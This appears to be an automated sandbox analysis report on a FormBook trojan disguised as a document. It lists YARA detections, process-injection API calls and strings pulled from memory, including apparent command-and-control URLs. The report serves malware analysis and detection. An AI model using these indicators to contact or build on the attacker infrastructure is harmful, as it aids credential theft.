                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:18:51 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Sep 2024 13:07:54 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Sep 2024 13:07:57 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Sep 2024 13:07:59 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Sep 2024 13:08:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: control.exe, 00000006.00000002.4134255300.0000000006170000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.00000000041A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cake11298.online/7ew2/?IhkTb=xPfHG0o8kZI8&3tV=IAPJnQ6xP9g
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://cloud.naver.com/
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/CheckUpload.ndrive
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/DoDelete.ndrive
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/GetList.ndrive
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/MakeDirectory.ndrive?
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/Status/GenerateKey.ndrive
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/Status/Get.ndrive
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1717296789.0000000003420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://static.nid.naver.com/enclogin/keys.nhnIhttps://nid.naver.com/nidlogin.login
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://static.nid.naver.com/login.nhn?svc=wme&amp;url=http%3A%2F%2Fwww.naver.com&amp;t=20120425
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: uFLByAWAOFbhtV.exe, 0000000A.00000002.4134964235.0000000005910000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.globyglen.info
                Source: uFLByAWAOFbhtV.exe, 0000000A.00000002.4134964235.0000000005910000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.globyglen.info/tni7/
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722359296.0000000005E10000.00000004.00000020.00020000.00000000.sdmp, PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: control.exe, 00000006.00000002.4134255300.0000000006626000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000004656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: control.exe, 00000006.00000002.4134255300.0000000005E4C000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000003E7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: control.exe, 00000006.00000002.4132398440.0000000002F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: control.exe, 00000006.00000002.4132398440.0000000002F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: control.exe, 00000006.00000003.2023052189.00000000080F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: control.exe, 00000006.00000002.4134255300.0000000006C6E000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000004C9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.healtheduction.site/2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KU

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0042C003 NtClose,4_2_0042C003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_05612DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_05612C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612B60 NtClose,LdrInitializeThunk,4_2_05612B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056135C0 NtCreateMutant,LdrInitializeThunk,4_2_056135C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05614650 NtSuspendThread,4_2_05614650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05614340 NtSetContextThread,4_2_05614340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612D30 NtUnmapViewOfSection,4_2_05612D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612D00 NtSetInformationFile,4_2_05612D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612D10 NtMapViewOfSection,4_2_05612D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612DD0 NtDelayExecution,4_2_05612DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612DB0 NtEnumerateKey,4_2_05612DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612C60 NtCreateKey,4_2_05612C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612C00 NtQueryInformationProcess,4_2_05612C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612CF0 NtOpenProcess,4_2_05612CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612CC0 NtQueryVirtualMemory,4_2_05612CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612CA0 NtQueryInformationToken,4_2_05612CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612F60 NtCreateProcessEx,4_2_05612F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612F30 NtCreateSection,4_2_05612F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612FE0 NtCreateFile,4_2_05612FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612FA0 NtQuerySection,4_2_05612FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612FB0 NtResumeThread,4_2_05612FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612F90 NtProtectVirtualMemory,4_2_05612F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612E30 NtWriteVirtualMemory,4_2_05612E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612EE0 NtQueueApcThread,4_2_05612EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612EA0 NtAdjustPrivilegesToken,4_2_05612EA0
